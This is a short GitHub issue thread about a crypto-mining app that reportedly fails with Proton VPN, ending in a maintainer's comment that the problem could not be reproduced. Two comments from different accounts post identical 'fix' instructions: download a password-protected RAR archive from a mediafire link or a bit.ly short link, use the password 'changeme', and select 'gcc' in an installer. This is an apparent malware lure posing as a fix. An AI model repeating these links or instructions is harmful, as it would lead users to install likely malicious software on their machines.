### ISSUE TITLE
Doesn't work with proton vpn

### ISSUE THREAD

**Issue by metalaureate** [tari-project/universe#186]
**Describe the bug**
windows user with proton VPN wasnt able to get it to work
disabled his VPN and was able to start mining

Armagan adds: the free version only gives you the server in the Netherlands and Romania... and as far as I know there are restrictions on the free version (if you want to watch a movie it shuts down automatically)... I was using the paid version last month and there was no problem(for mining)

**Comment by SupunDevendra** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by stringhandler** [comment]
connected fine on proton. Could not reproduce
